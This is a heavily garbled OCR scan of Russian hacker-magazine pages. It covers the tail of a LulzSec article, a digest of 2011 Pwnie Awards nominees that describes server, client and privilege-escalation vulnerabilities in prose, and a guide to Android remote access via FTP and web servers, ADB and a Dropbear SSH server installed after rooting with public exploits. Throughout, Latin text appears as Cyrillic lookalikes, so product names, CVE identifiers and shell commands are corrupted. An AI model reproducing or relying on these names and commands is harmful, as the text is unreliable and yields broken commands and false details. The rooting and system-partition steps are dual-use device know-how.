рирующие в логах |оерте7 Т, Меигоп, З{огт, {гоЦроЦ и моодоо не 
являются членами экипажа [и[7 Воа\, а человек, сливший логи 
в Сеть, уже жестоко наказан. 

В самом ли деле группа ушла в подполье и прекратила свое 
существование? Неизвестно. «Твиттер» работает и обновляется, 
а всего несколько часов назад был взломан британский таблоид 
ТБе Зип. На страницах издания разместили липовую информа- 
цию о смерти Руперта Мердока — владельца компании Ме\мз 
Согрогайоп. Кроме того, одновременно было атаковано подраз- 
деление Мемз Согрогайоп — Мем/з |п{егпаНопа! и сайт газеты 
«ТВе Гитез». Как ни странно, «Твиттер» [Г и175ес непрозрачно 
намекает на причастность веселых хакеров к этим событиям. Так 
или иначе, но об этих парнях мы очевидно услышим еще далеко 
не раз. == 
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Пятая ежегодная 
хакерская премия: 
как это было? 


© Уже пятый год подряд в конце 
лета объявляют номинантов на 
премию ТИе Рмууте Амгага$. Это 
своеобразный аналог «Оскара» 
или «Грэмми», но в сфере инфор- 
мационной безопасности. Самые 
нашумевшие серверные и кли- 
ентские баги. Самые крыше- 
сносящие исследования в обла- 
сти ИБ. Самые громкие взломы и 
эпические фейлы крупных ком- 
пании. Кто получил эти награды? 


Название премии — игра слов, происходящая от «ру/п\о\м/п» 
(поиметь, захватить, скомпрометировать} и слова «ропу» (пони, 
в смысле, маленькая лошадь. К тому же название переклика- 
ется с ТВе Топу Ам/аг4$ — известной театральной американской 
наградой, хотя, впрочем, какое нам дело до всех этих фонетиче- 
ских созвучий. Главное, что это одновременно и очень серьез- 
ное, и очень веселое мероприятие. Здесь учредители выставля- 


ют для награды самые серьезные исследования, которые даже 
на хакерских конференций понимает два с половиной человека. 
И здесь же стебутся над самыми нелепыми и эпическими про- 
валами крупных компаний. Все это действие проходит в рамках 
конференции В(аск На\, где и объявляются результаты. 
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За лучший серверный баг 


Премия вручается за обнаружение и эксплуатацию наиболее 
интересного и технически емкого бага в серверном софте. 
Сюда входят любые приложения, доступные удаленно без 
взаимодействия с пользователем. 


Уязвимости Ра9Чтад Огасе 
в фреймворке АЗР.МЕТ (С\УЕ-2010-3332] 


Джулиано и Тай показали, что фреймворк АЗР.МЕТ уязвим 

к атаке «Радатд Огас[е», которая может быть использована 
для удаленной компрометации практически любого АЗР.МЕТ 
миеб-приложения, что в ряде случаев приводит к выполнению 
несанкционированного кода на сервере. 


Переполнение кучи 

в М'сгозо_ ЕТР (СУЕ-2010-3972] 

Мэтт Берджин (Мак Вегдт) 

Мэтт нашел уязвимость, приводящую к удаленному выполне- 
нию кода в Ир-сервере от МтсгозоЙ. Уязвимость существует 
из-за ошибки проверки границ данных при кодировании сим- 
волов Те[пе{ АС (в частности, символа 0хЕЕ). Уязвимость может 
быть использована безо всякой аутентификации: при помощи 
длинного, специально созданного ЕТР-запроса злоумышленник 
может вызвать переполнение в куче. Этот баг был использован 
Крисом Валасеком (СВг15 Уа[азеК] и Райаном Смитом (Вуап 
пи}, которые добились контроля над регистром Е1Р и этим 
показали, что возможен полноценный хек Ир-сервера. 


Инъекция метасимволов 

в [5С ансИепе (СУЕ-2011-0997)] 

Себастьян Крамер (5еБазНап Кгантег]) 

и Мариус Томашевски (Маг!и$ ТотазсНеми$ КИ) 

15С айсЦег{ не фильтровал определенные метасимволы в отве- 
тах от ОНСР-сервера. Независимые исследователи Себастьян 
и Мариус нашли этот баг и показали, что в зависимости от опе- 
рационной системы возможно выполнение произвольного кода 
на стороне клиента. Что особенно приятно, при помощи этой 
уязвимости один поддельный ОНСР-сервер может поиметь кучу 
клиентских машин во всей локальной сети. 


Переполнение стэка в инкапсуляции |РСотр 
В$0-систем (СУЕ-2011-1547) 

Тэвис Орманди (Та\!5 Огтападу) 

Большинство сетевых стеков В5О-происхождения содержат 
уязвимость в коде обработки инкапсуляции 1РСотр, обычно 
используемой вместе с |РЪес. При помощи рекурсивных попы- 
ток деинкапсулировать из [РСотр полезную нагрузку, взлом- 
щик может вызвать переполнение стека ядра [не переполне- 
ние буфера]. По предположениям Тэвиса, это вполне возможно 
превратить в эксплоит для удаленного выполнения кода. 


Удаленное исполнение кода 

в Ехит (СУЕ-2010-4344) 

Неизвестный автор 

Сплоит для почтового сервера Ехит впервые был обнаружен 
Сергеем Кононенко, а его автор неизвестен. Эксплоит исполь- 
зует переполнение буфера в функциональности логирования 
для выполнения кода на сервере. Эксплоит был весьма инте- 
ресным, потому что вместо угона ЕР, взломщик перезапи- 
сывал внутреннюю структуру данных зПеЦ-командой, которая 
выполнялась при обработке сервером следующего сообщения. 
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За лучший клиентский баг 


Вручается человеку, который открыл или проэксплуатировал 
наиболее интересный клиентский баг. Сегодняшняя реаль- 
ность такова, что слово «клиент» — это в значительной степени 
синоним к слову «браузер». 


Уязвимость ЕгееТуре в 10$ (С\УЕ-2011-0226) 


Сотех проэксплуатировал баг в интерпретаторе шрифтов Туре 
1 из библиотеки ЕгееТуре, используемой в мобильной версии 
За!ам. Используя контроль над интерпретатором для конструи- 
рования сложных КОР-нагрузок, Сотех обошел АЗЁК в 10$ и 
при помощи уязвимости в ядре сумел найти путь для выполне- 
ния неподписанного кода. Свой эксплоит Сотех залил на сайт 
|а(огеакгпе.сог и тем самым помог джейлбрейкнуть свои 105- 
устройства тысячам желающих. 


Побег из песочцницы боо9е Спготе 

Компания УЦРЕМ 

Известная есигцу-компания УЦРЕМ показала демку эксплоита 
для боод(е СПготе, который обходит знаменитую своей надеж- 
ностью и навороченностью песочницу браузера от бооцще и 
запускает код с максимальными привилегиями на локальной 
системе. Эксплоит не попал в паблик, но зесигКу-команда 
Соод[е предположила, что УЦРЕМ эксплуатировала какую-то 
уязвимость во Е[азП. Дело в том, что песочница для Еа$П- 
плагина (а в Спготе он теперь входит по умолчанию] намного 
слабее, чем песочница для процесса рендеринга НТМИ- 
содержимого. Парни из УУРЕМ дали понять, что, скорее всего, 
это утверждение близко к правде. 


Выполнение произвольного 

кода в Лауа (С\УЕ-2010-4452] 

Фредерик Хогуин (Егедегс Нодит) 

Эта уязвимость особенно интересна тем, что использует воз- 
можность самой /ауа для произвольного выполнения кода. Она 
не опирается на какие-либо известные техники вроде перепол- 
нения буфера или повреждения памяти. Она применяет только 
известные фичи КЕ и на 100% надежна. 


Эксплоит для В аскКБеггу с конкурса Рит2О\м/т 
Винченцо Лоззо (МУтсепто [02720), Вильем Пинкаерс (М/Щет 
РтсКаег$), Ралф-Филипп Вейнманн (Ка{-РНИИрр ММеттапп] 
Исследователи использовали две уязвимости \\еб Ки и цело- 
численное переполнение, чтобы суметь выполнить код на 
устройствах В(асКВеггу. Их достижение впечатляет еще 
больше, если взять в расчет тот факт, что у них не было под- 
ходящего отладчика, дампа ядра и какой-либо документации о 
внутренностях устройств компании КМ. 


Х$5 в магазине приложений Апдго!а 

Джон Оберхейд (оп ОБегве!4е) 

Джон Оберхейд обнаружил Х$5$-уязвимость в магазине при- 
ложений Апаго!а, которая позволила ему устанавливать произ- 
вольное приложение на смартфоне жертвы, если та открывала 
зловредный линк. 
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За баг для повышения привилегий 


Присуждается человеку, который обнаружил и смог проэксплуа- 
тировать наиболее технически сложную и интересную уязви- 
мость для повышения привилегий. Чем больше набирают обо- 
рот защитные механизмы вроде виртуализации или мандатного 
управления доступом, тем большее значение получает этот тип 
уязвимостей. Особенно ценятся возможности для локального 
повышения привилегий в системе, выхода из песочницы и про- 
странства виртуальной машины. 


Поднятие привилегий в С5В 55 (С\УЕ-2011-1281) 
Мэтью «]00ги» Журчик ([МаКВем/ «]00ги» Уигс2ук) 

Баг для повышения привилегий в \/падом/5 С$К5$5, эксплоит 
для которого удалось написать благодаря интересным методам: 
спреингу указателей путем создания и освобождения сотен 
консолей, а также инъектированию данных в память процесса, 
который запущен как 5УЗТЕМ (\пап.ехе] с помощью генера- 
ции множества окон с чрезмерно длинными заголовками. 


Перезапись памяти ядра 

с помощью функции $е{ {$ (С\УЕ-2010-4258] 
Нельсон Елхаж (Ме[5оп Е\аде) 

Нельсон Елхаж нашел интересную связь между потоками Ш пих, 
созданными с флагом СЕОМЕ_СН!О_СТЕАВТЬ и функцией 
5ет_[5 ГипсИоп в ядре, что сделало возможным на новом уровне 
использовать те баги, которые ранее могли вызвать разве что 
о5. Публичный РоС для этой уязвимостей был опубликован 
Дэном Росенбергом. 


Поднятие привилегий с помощью 

Ыпих $ОВТ@М (С\УЕ-2010-3847) 

Тавис Орманди (Та\!$ Огтапду] 

Тавис обнаружил, что динамический линковщик а9ИБс недо- 
статочно корректно обрабатывает значение ФОКЕМ для 
переменной окружения ЕО_АЧОП, что позволяет локальным 
пользователям повысить привилегии во время запуска зети!а 
бинарников. Таким образом можно получить гооГа. 


Уязвимости м/ит32К иег-тоде 
са(БасК’ов ядра \/тдом/5 [М$11-034) 


В течение нескольких месяцев, Таржеи обнаружил более 40 
уязвимостей в ядре \\Лпдо\м/$. В его презентации на конферен- 
ции |пИЦга(е 201Т, он описал детали этих уязвимостей и техни- 
ки их эксплуатации. 


Победитель в номинации 


выделен цветом и отмечен значком: 
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За самое инновационное 
исследование 


Премия вручается людям, опубликовавшим наиболее инте- 
ресные и новаторские исследования в печатном виде, в виде 
презентаций, инструментариев или даже в виде постов из 
ета(-рассылки. 


ЗасКасКт9 

Джон Оберхейд (оп Обегве!4е), 

Ден Розенберг (Бап КозепЬегд] 

Джон Оберхейд и Ден Розенберг представили ряд техник для 
эксплуатации уязвимостей ядра Шпих на Огзес-системах и 
нечаянно развязали настоящую гонку вооружений с зрепаег и 
РахХ Теат. Эта работа — великолепный пример исследования, 
сосредоточенного вокруг системы, эскпуатировать которую 
крайне трудно. 


Эксплуатация уязвимостей 

в НазВ АсНоп$сгре 

Хейфей Ли (НаНе! 1] 

Автор получил возможность эксплуатировать уязвимости ЛТ- 
уровня в ИазВ АсйопЪсяр{ на современных операционных 
системах, вроде \\пЧом/з 7, обойдя одновременно и АЗЁЕК и ОЕР. 


Аудит черным ящиком АдоБе 5ПосК\гауе 

Аарон Портной (Аагоп Рогпоу}, Логан Браун (1одап Вгом/п] 
Данная презентация представляет собой всесторонний обзор 
5гпаг{Неар — распределителя памяти в Адобе ЭПосК\м/ауе. В 
доклад включено огромное количество полезных для 
реверсинга техник. 


Защита ядра с использованием 


техники 54айс Втагу Кемиг\тод 


Одно дело претворить в жизнь какие-то идеи из рах-ИКиге {ж, 
и совсем другое — осуществить их путем статического анализа 
на \\/Ипдом/5, автомагически [не опечатка!] переписать драйвера 

и сохранить совместимость, заставив все это работать на всем 

разнообразии версий \АМИп9о\муе. 


Осмысление ЕЕН-хипа 

Крис Валасек (СЬг1$ Уа[азек) 

В этом оригинальном документе представлен детальный обзор 
[ом/ ЕгадгтегцаНоп Неар в МИп9омз 7 и М&а. Трудно переоце- 
нить значимость данного исследования! 
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За о ламерскую 
реакцию вендора 
Премия вручается производителям, которые хуже всех справи- 
лись с уязвимостями в своих системах безопасности и наибо- 
лее эффектно сели в лужу. 


Удаленная эксплуатация переполнения 

стека в Ореп5$Н в Моуе ( Ме \Маге 

Вендор: МоуеЦ 

СО адмзогу четко заявили, что обнаружили удаленно доступ- 
ную уязвимость переполнения стека, однако МоуеЦ утверж- 
дали, что это был обыкновенный 005 и отказывались патчить 
дырку до тех пор, пока 20| не опубликовали подробности в 
своем блоге. С 0х41414141 не поспоришь. 


Мад!х Мис МакКег 16 

переполнение стека 

Вендор: Мад!х 

Когда один из членов СОКЕГАМ сообщил о наличии уязвимо- 
сти в программе Мизс Макег 16, ему пригрозили судебным 
иском, если он опубликует РоС-эксплоит. Эксплоита в паблике 
так и не появилось, но всю информацию о дырке исследовате- 
ли непременно опубликовали. 


Скомпрометированные 


токены К$А $есиг|) 


Их хакнули, все их еси токены были скомпрометированы. 
Но что сделали парни из К5А? Фактически отмахнулись от 
этого, будто данное событие было совершенно незначитель- 
ным. Они сообщили своим клиентам о том, что замена токенов 
вовсе не является необходимой. Так продолжалось до тех пор, 
пока по вине В5А не взломали [Госквеед-МагИт. 
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За самый эпический фэйл 


Иногда ты выкладываешься на все 110%, но от этого твой фэйл 
лишь становится еще более смачным. И зачем был бы нужен 
интернет, если в нем не был бы задокументирован самый гром- 
кий фэйл всех времен и народов? Эта награда присуждается 
лицу или компании, потерпевшей(-ему] самый яркий ергс фац. 
Эта номинация в этом году представляет собой настоящий 
бенефис компании 5опу — в категории представлено шесть 
фэйлов и все они допущены японцами: 


Когда Га(Оуег ом и беоНо{ опубликовали информацию о том, 
как осуществить джейлбрейк Р$3, 5опу слегка обиделась. 
Очевидно, там не имеют понятия, как работает интернет, и не 
знают, как трудно бывает очистить воду в бассейне от мочи. 

В 5опу упорно пытались удалить данные из интернета и засу- 
дить беоНоГа и других хакеров, чтобы те канули в лету. Само 
собой, эти попытки увенчались таким же успехом, как и запуск 
Ми! 015Сс. 


Кстати, о моче в бассейне. Оказывается, столь же «хорошо» 
5опу защищает личные данные пользователей $опу ОпИпе 
Ег{егатилеп{ (5ОЕ). Информация о примерно 25 млн аккаунтов 
БОЕ [всего там порядка 77 миллионов учеток] была украдена 
неизвестными хакерами. Эта метафора абсолютно лишена 
смысла, но суть ты уже понял: ЕА||. 


Кое-что 5опу определенно делает хорошо — выпускает хиты 
и развлекает своих фанатов. Ой, погоди, мы сказали 5опу? 
Мы имели в виду |и[75ес, и, полагаем, что за это 5опу можно 
засчитать еще один ГАШ. 


Зопу усвоила жестокий урок и поняла, что их Р!ау{айоп 
Мемогк дырявый, как сито. Компания была вынуждена 
закрыть РЪМ на два месяца, чтобы переработать его с нуля. 
Решившись на этот шаг, они донесли до всех, начиная от 
твоей 8-летней сестренки и заканчивая твоим парикмахером, 
насколько важна безопасность. Радость для нас, и соболезно- 
вания акционерам $опу. 


Ты уже заметил здесь определенную повторяющшуюся схему? 
Погоди, дальше будет еще лучше! Вероятно, 5опу сумела бы 
лучше справиться с этими многочисленными атаками, если бы 
не недавние значительные сокращения в команде специали- 
стов по сетевой безопасности. Очень вовремя, чуваки. 
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За Ерс Омпаде 


Премия Ерюс Омпаде присуждается хакерам, ответственным за 
самые разрушительные, за самые широко известные или же 
просто за самые ржачные взломы. Также награды могут удо- 
стоиться и исследователи, ответственные за раскрытие уяз- 
вимостей или эксплоитов, которые породили в Сети огромное 
количество ом/м/“ов [а именно так учредители конкурса измеря- 
ют степень Ом/паде} . 


Анонимус за взлом НВбаггу Еедега| 

Если у тебя хреновая кастомная СМ, если ты используешь 
один и тот же пароль и на администраторском аккаунте и в 
Соод(е Аррз, то тебе, пожалуй, не стоит затевать ссор с какими- 
либо хакерами. Лучше оставь этот рассерженный рой в покое. 
Как выяснилось, НВСагу Еедега{ «страдали» всем вышеопи- 
санным, и Анонимус доставил им 1,21 гига-омлм. 


[и 5ес за хак всех, кого только можно 

[и 75ес доставили множество лулзов хакерами и специали- 
стам по безопасности со всего мира. Они атаковали Гох 
Мем/с, РВУ, Мищепао, ргоп.сот, МН, |п{гадчцага, сенат США, 
Ве езда, Мтесга!, [еадие от (едепаз, ТБе Езсар!{, Е\Е 
опИпе, ЦРУ, издания ТВе Титез и ТВе Фип. Все это время они 
генерировали вокруг себя невероятную медиаподдержку и 
успешно ускользали от правоохранительных органов. 


Бредли Менинг (Вга@(еу Мапп!тд) и МИКЦеаК$ 
Якобы Бредли Менинг и \/ИКЦеаК$ были орудиями в междуна- 
родном инциденте огромных масштабов, в ходе которого были 


посрамлены правительства многих стран мира. А виной всему 
был СО Леди Гаги. 


Сколько центрифуг уничтожил твой руткит? Сколько госу- 
дарственных ядерных проектов разрушила твоя программа? 
Сколько нацеленных на оборудование Одау-эксплоитов и рут- 
китов, о которых никто никогда не слышал, ты написал? Вот 
именно. 


За лучшую песню 


На какой церемонии нет номинации «Лучшая песня»? Хакеры, 
пишущие песни и рэп [пародийный и оригинальный), это на 
удивление старая традиция. 

На прошедших Р\/ге удалось заставить НО и На(аг читать 
рэп. С этого года, кстати, появилось обязательное требова- 
ния — все песни должны быть представлены в аудиоформате. 
Раньше же можно было обойтись только словами песни и в 
некоторых случаях музыкальным сопровождением. В этой кате- 
гории победил Джордж «СеоПс\» Хотц с эмоциональным рэпом 
о компании 5опу и судебном процессе. Его произведения, как 
и всех номинантов, ты можешь найти на нашем диске. = 


> 091 


м м Евгений Зобнин (ехесЬЖ.ги) 


Выбираем 
Лучший 
Апаго!-софт для 
взаимодействия с 

компом 


БОЛЬШОЙ БРАТ 
И ЗЕЛЕНЫЙ РОБОТ 


® Благодаря открытому исходному коду и ядру Мпих, лежащему в 
основе, Апаго! завоевал большую популярность среди продвинутых 
пользователей и гиков. Это, в конечном счете, привело к появлению 
большого количества открытых и бесплатных приложений, 
упрощающих жизнь всем, кто понимает, что в его кармане 

лежит не просто игрушка, а полноценный сетевой компьютер. 


В этой статье мы рассмотрим лучшие приложения для удаленного 
управления компом и самим смартфоном, выясним, можноли ис- 
пользовать устройство под управлением Апаго!а для слежения и 
управления сервером в дороге и узнаем, как проще и удобнее всего 
синхронизировать файлы «по воздуху». 


Синхронизируем файлы 


Наверное, одна из самых важных для нас функций смартфона — это 
простой и удобный способ синхронизации файлов с домашней 


машиной. Кажется, что с этиму Апаго!а все в порядке: втыкаем шнур, 


выбираем в меню «доступ к 5О-карте» (в разных прошивках это мо- 
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жет быть реализовано по-разному} и видим новую флешку. Никаких 
драйверов, никакого дополнительного софта. Все просто работает 

и работает, надо сказать, хорошо. Воттолько передавать файлы по 
кабелю в наш беспроводной век как-то не слишком удобно, особенно 
если нужно скинуть файлы с компа соседа, который, может, и не имеет 
дома гписго-Ц$В-шнур. 

Гораздо удобнее слать файлы по воздуху с использованием \\!!-Е! или 
ЗС-сетей, поддержка которых есть даже в самых бюджетных Апаго!а- 
девайсах [китайские «смартфоны» за $100 в расчет не берем). 
Однако из коробки делать такое Апаго!а не умеет, поэтому придется 
отправиться на поиски соответствующего софта. 
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Разработка 


Отладка по ЦВ 


Включить режим отладки пр 


нь БЫ р РРР: а ав р ле = 
ПОД ЛЮ = а | # & АУМ | ьЮ у 


РеБир о\мег И5В опу 


а : = = 5 | = вера ТА: Г 
опт епаве ЧеОиРРИР ОМеГ УУНН 


Уведомлен ИЕ ОГЛадки по 


Показывать уведомление отладки по 


сии = о а мБ = .. 
|15ы аключени 
мы =й ВЫЙ при | АА: Ч ТЕ и 
1 


Оставить включенным 


Ты Нм . м а я Е = = | каш = ини = 
Во время зарядки экран чудЕТ ВСЕГДа 
1 1 Мм 


ГГ ПА ы в 
= РС] ыы 


использование 


вных меспопвиюжении 


Закрытие приложений 


з нажатие кнопки Назад 


"а | 


-@ запущенные 


Имя хоста устройства 


Включаем АОВ 


Итак, претендент номер один — ЕТРЪЗегуег. 

ЕТРФегуег — это настоящий ЕТР-сервер с открытым ис- 
ходным кодом, который можно использовать для сетевого 
расшаривания файлов 50 -карты. Пользоваться програм- 
мой проще простого: скачиваем через маркет, запускаем, 
заполняем поля Цзег (ЕТР-пользователь}, Раз (пароль для 
входа), Рог (любой выше 1024, например, 1234}, Веаи{ аг 
(дефолтовый каталог, здесь нужноуказать /59сага или /ппп И 
5Чсага), ставим галочку напротив Апу Ме\могК и нажимаем 
кнопку «Зауе апа Ке$аг{ Зегмсе». После этого появится 
пока еще пустое окно со списком клиентов, в заголовке ко- 
торого будетуказан текущий [Р-адреси портЕТР-сервера. 
Их надо скормить ЕТР-клиенту, например, стандартному / 
изг/б п/р или пс.Преимущество такого подхода втом, что 
сам по себе сервер почти не потребляет ресурсов, поэтому 
его можно держать включенным всегда. Однако это всего 
лишь [ЁТР-сервер, со всеми его проблемами безопасности, 
ограничениями и неудобством использования. Идеальным 
вариантом здесь был бы 5ЕТР, но 5$Н-сервер для Апаго!а 
нетак просто установить [тем не менее в следующем раз- 


делея расскажу, как это сделать}, поэтому мы обратим свой 
взор в другую сторону — навеб-сервер \\ебЪПагпод. 
Мер Ватто е — это бесплатная версия одноименного 


НТТР-сервера, разрабатываемого компанией Мех{Арр. 
После подключения к серверу с помощью любого 
браузера ты получишь доступ кудобному интерфейсу, 
позволяющему закачивать и сливать файлы сустрой- 
ства, проверять статус устройства (уровень заряда 
батареи и сигнала \\М-ЁЕ!, использование карты памяти и 
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Гоппесеа го \Л.Н пебмогЕ 1313, 


ЩЕ 


М 


п усуг сотруег$ меб Бгомузег. 


Гог омгпег ассезз, егтег раззмгога: 
БАлллгу 1 


аи | 


Па я 
а 1 Ра 


р 


ор 
\\Мебъпайпа 


О.А ре п.оллбре 


Мепиц 


процессора]. Платная версия плюс ко всему этому имеет 
встроенный музыкальный и видеоплееры, просмотрщик 
фотографий, позволяет настроить гостевой доступ, а 
также снимает ограничение на одновременную переда- 
чутолько одного файла (это, наверное, главный стимул 
ее купить). 

Настроить сервер предельно просто. Запускаем приложе- 
ние и нажимаем кнопку «5{ак > в левом нижнем углу. По- 


сле этого на экране появится [Р-адрес устройства, порти 
пароль для доступа к данным, которые необходимо вбить 
в браузер. По умолчанию \\ебЪВагпа работаеттолько 
через \\/1-Е!, но это ограничение можно снять через окно 
настроек [«Мепи -> бе таз -> Ме\могк 5е таз -> Се\щаг 
ассе55»). Там же можно настроить отправку оповещения 
по почте при каждом подключении кустройству. 


Управляем телефоном 


Апаго!4 оснащен довольно мощным средством управления 
под названием АВВ (Апаго!4 ОеБид Впаде). Это протокол 
для манипуляции и отладки устройства с персонального 
компьютера, клиент для которого входит в стандартную 
поставку Апаго!4 $ОК [но его можно скачать и отдельно с 
сайта }. 

С помощью АВВ можно произвести такие действия, как 
копирование файлов во внутреннюю памятьустройства, 
синхронизировать каталоги слокальной машиной, по- 
лучить эВе(-доступ, просматривать журнал отладочных 
сообщений, устанавливать и удалять приложения, атакже 
делать многие другие низкоуровневые вещи. 


Е Р5егуег 


р 1пРо 

® Для Апаго!а есть 
официальный 
Огорбох-клиент, 

с помощью кото- 
рого очень удобно 
синхронизировать 
файлы между компом 
и устройством. 


® Олно из главных 
достоинств АОВ в 
том, что реализация 
этого протокола в 
телефоне фактически 
не зависит от самого 
Апаго!а. С помошью 
АБВ можно управлять 
телефоном даже в 
том случае, если тот 
находится в загрузоч- 
ном меню. 


® Любое приложение 
из этого обзора мож- 
но легко установить, 
просто отсканировав 
их ОК-коды с по- 
мощью приложения 
Вагсоде Эсаппег. 
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'Ого19$5НЧ. 


“апиз: Вуппте 


192.168.0.100 


Поднимаем $$Н-сервер 


Раз5' 


Ротт: 


/тпу$0сага 


СПоозе Ро!ег 


| Вест ассе$$ го дегац! От апа 
| зи Багестоге$ 


\МаКеир оп согптапа 


Кетезй тедта аКег {гапзРег 


Доме соппесНоп$ 


36 соппесвоп 
Настраиваем ЕТР 5егуег 


› 094 


Чтобы АОВ заработал, необходимо разрешить его использование 

в настройках телефона («Настройки -> Приложения -> Разработка 

-> Отладка по У$В»}]. После этого можно подключить устройство к 
компу с помощью гп!сго-И$В-шнура и запустить АБВ в режиме поис- 
ка устройств: 


$ ./ааЬ аем1се$ 
016804110602С924 е\у1се 


Если на экране появится строка, похожая на эту, значит, все ок, и можно 
приступать к извратам над устройством. Наиболее важная команда 

в этом процессе — это а@Б эВеЦ, которая открывает $Пе(-доступ к 
устройству, то есть к стандартной [но урезанной] командной строке Мпих. 
Здесь работают все те же РОЗХ-команды по, ($, рз ит.д. Однако общее 
количество доступных команд очень мало, и среди них нет действитель- 
но важных системных инструментов, как, впрочем, ибинарника /б!п/ 

5и, без которого нельзя получить права гос* (это значит, что для записи/ 
изменения будет доступна только 5О-карта). Чтобы получить полный 
гос{-доступ, придется взламывать защитуустройства иустанавливать 
полноценный Бизубох, однако этатема заслуживает отдельной статьи, 

и здесь мы ее рассматривать не будем. Скажутолько, что сегодня боль- 
шинство популярных моделей телефонов можно поломать с помощью 
простой в использовании программы 5ирегОпеСИск [5Вогизе.ога, 
можно запустить в Мпих с помощью команды попо бирегОпеСИсК.ехе). 
Другая полезная для нас возможность АОВ, это безвопросная установ- 
ка приложений прямо с жесткого диска компа. Просто незаменимая 
фича втом случае, если требуется установить большое количество 
скачанных из интернета приложений одним махом. Для этого достаточ- 
но выполнить одну простую команду: 


$ Рог арк 1п *.арК; 40 ./ааЬ 1п5%а11 $арк; адопе 


АБВ удобно использовать для заливки файлов наустройство: 


$ ./ааЬ рип файл_или_каталог /каталог/на/устройстве 


И сливать снего: 


$ ./ааЬ ри11 /каталог/или/файл/на/устройстве каталог 


Плюстакого подхода втом, что он нетребует монтирования устройства 
в качестве флешки, поэтому сразу после подключения смартфона к 
компу можно начать работу с файлами. Особенноудобна в этом случае 
команда а@Ь эупс, позволяющая синхронизировать каталог на жестком 
диске компа с каталогом наустройстве: 


$ ./ааЬ зупс /путь/до/каталога/путь/до/каталога/ 
на/устройстве 


Скопированы будуттолькоте файлы, которые были изменены/добавле- 
ны в каталог на компе (своего рода бэкап). 

Также с помощью АОВ можно перезагрузить телефон в меню загрузчика 
[аналогвыключения и включения смарта с зажатой кнопкой уменьше- 
ния громкости]: 


$ ./ааб гебоо*-Боо*Тоадег 


Все эти функции АВВ невероятно удобны, но опять же ограничены 
кабелем, которыйтак или иначе придется втыкать в комп даже втом 
случае, если требуется скинуть всего один файл или выполнить простую 
команду. К счастью, на этот счету разработчиков Апаго!9 есть вполне 
очевидный ответ — АОВ может работать по сети. По умолчанию эта 
функция отключена в настройках телефона, ктому же в целях безопас- 
ности она работаеттолько в \\-Н!-сетях, но если тебя это не останав- 
ливает, тогда иди в меню и снимай галочку напротив пункта «ОеБид 
оуег УВ оп» [«Меню Приложения -> Разработка -> Ферид оуег 
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ч ЕпЫЙЗН в 


Пользоваться СоппесВо{ действительно удобно 


Ц$В оп]. После этого телефон начнет слушать АБВ- 
подключения на порту 5555 (узнать текущий [Р-адрес мож- 
но так: «Меню -> Беспроводные сети -> Настройки \\/-Е! 
Кнопка «Меню» -> Дополнительные функции [Р-адрес»). 
Далее можно законнектить АВВ ктелефону: 


$ ./ааь соппес* ТР-адрес 


После этого следует проверить подключение: 


$ ./ааЬ аем1се$ 


192. 165.0: 1909 ---- де\1се 


И начать работать стелефоном так же, каки при проводном 
подключении, втом числе получить доступ к $ВеЦ. Однако 
эту функцию гораздо лучше выполняет 55Н-сервер. 


55Н — наше все 


Внутри, под толстым слоем /]ауа-библиотек и красочных 


графических интерфейсов, Апаго!а остается все той же 
[Ч/пих-системой, которая имеет некоторые ограничения 

и несовместимости, но в большинстве своем следует 
стандарту РОУХ. Это значит, что для нее можно собрать 
практически любой консольный [Чпих-софт, включая все- 
ми нами любимый 55Н-сервер, аточнее — его легковесную 
реинкарнацию под названием Огорбеаг Так мы сможем не 
только подключаться кустройству с помощью стандартного 
5$Н-клиента, но и получать доступ к файлам на $0-карте 
посредством протокола ЗЕТР, поддержка которого есть в 
большинстве менеджеров файлов для пих. 

Есть несколько способов установить Огорбеагв 
Апдго!а, самый простой из которых — скачать или ку- 
пить 55НОго!а в Апаго!а МагКе{ за один евро и наслаж- 
даться результатом. Однако если ты не хочешь замо- 
рачиваться с виртуальными кредитными картами или 
платить за открытый софт (ОгорБеаг все-таки чистый 
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Ореп 5оигсе]}, тогда можно пойти и по более трудному, 


но надежному пути, который предполагает вшивание 
5$5Н-сервера прямо в системный раздел Апаго!а, так 
что ему не будет страшен даже «Сброс до заводских на- 
строек». Для этого нужно выполнить всего три условия: 
1. Зарутитьтелефон с помощью эксплоитов, опубли- 
кованных на хда-Чеуеорег$.согп, или софтинтипа 
бирегОпеСИсК или 24гос\ (900.дИ/Ву/(х, работает прямов 
Апаго!). 

2.Установить ВизуВох из маркета (например, с помощью 


«ВизуВох паЦег»). Этот шаг можно пропустить, если гос\ 
был получен спомощью ЗирегОпеСИск. 
3. Залить наустройство сам ОгорБеаг: 


$ игеЕ Пер: //)Ии1$* .сот/агорбеаг.+аг. 527 
$ {аг -х2+ агорБеаг.Жаг.87 

$ ./ааЬ ризИ -/агорБеаг /$асага 

$ ./ааь °вВе11 

> 5и 


> тоип{ -о гетоипт ‚гм /зузфет 

> ср /засага/агорБеаг/* /зуз%ет/хЬ1п 

> сптоа +х /зузфет/х61п/АгорБеаг /зузет/хбЬ1п/ 
агорБеагКеу 

> мКа1г /Чафа/АгорБеаг 

> АгорБеагКеу -+ гза -+ /дафа/агорБеаг/агорБеаг_ 


г5а_По5*_Кеу 


> агорБеагкеу -* 45$ -+ /дафа/агорьеаг/ЧгорБеаг_ [айег Сеек 


95$_По${_Кеу 


Это все, теперь можно было бы запустить ОгорБеаг с по- 
мощью одноименной команды, однако я бы порекомендо- 
вал использовать для этого более удобную графическую 
оболочку 55НОго!а. 

Ого!Ч5$ На (соде.дооб(е.сого/р/Чго!4$$Ва/] — это обертка 
вокруг ОгорБеагс открытым исходным кодом, котораятак- 
же входит в состав СуаподепМоч 7.1. С помощью Огоа$ЪНа 
легко не только поднять 55Н-сервер наустройстве, нои 
настроить такие параметры, как метод аутентификации, 
изменить дефолтовый пароль [с помощью консоли это сде- 
лать не так просто, как кажется на первый взгляд] и другие 
параметры сервера. 

При первом запуске приложение попросит согласиться 

с генерацией начальных настроек, затем откроет экран 
настроек, наиболее важные для нас параметры кото- 

рого скрыты в пункте 5егмсе ап9 А{Пепийсайоп. Здесь 
можно изменить дефолтовый пароль [по умолчанию стоит 
«раз$\/ога»], добавить публичные ключи клиентов (с 50- 
карты}, атакже указать прослушиваемый порт (ТСР рог {о 
(${еп, по умолчанию 2222] и заставить сервер загружаться 
во время инициализации ОС (“а оп Боо%. 

Обрати внимание, что поумолчанию сервер запускается 

с правами обычного пользователя (что правильно), нов 
случае необходимости это можно изменить в соседнем 
меню «5у$ет зе паз -» Кип даегтоп аз гос{». Когда все 
настройки будут сделаны, можно нажать кнопку «Назад» и 
на появившемся экране — «За». Текущий |Р-адрес, атак- 
же логин и пароль будутуказанытам же. После этого можно 
